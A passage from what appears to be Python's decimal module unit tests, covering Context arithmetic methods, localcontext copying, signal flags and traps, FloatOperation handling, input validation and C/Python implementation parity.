self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
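# ``with localcontext(...)`` must install a *copy* of the supplied (or
# current) context for the duration of the block and restore the previous
# context on exit, even when blocks are nested or contexts are deleted early.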
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
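# Flag semantics: an operation's result and newly raised flags must not
# depend on which flags were already set, and the flags/traps mappings must
# compare like ordinary dicts.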
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
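# FloatOperation: implicit float->Decimal conversion sets the flag (and
# raises once trapped), while the explicit from_float() and
# create_decimal_from_float() constructors stay silent.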
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
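# Mixed Decimal/float comparisons always set FloatOperation; with the trap
# enabled the ordering comparisons raise while (in)equality only flags, and
# containers (sets, sorting, ``in``) trigger the same machinery.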
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation = self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
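# Malformed Context attributes -- negative prec, unknown rounding modes,
# bogus flag/trap dicts, attribute deletion -- must raise TypeError,
# ValueError or KeyError rather than leave the context inconsistent.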
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
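# Context may be subclassed; a subclass that configures itself by plain
# attribute assignment still gets full input validation and the usual
# arithmetic behaviour.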
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
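# Unless the C module was built with extra (non-standard) functionality, the
# C and Python modules must agree on the context limits, __version__ and the
# set of public attributes.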
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
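# Coverage: assorted checks for rarely exercised paths -- implicit context
# use, divmod and power special cases, __round__, radix, reflected
# operators and copy operations.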
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
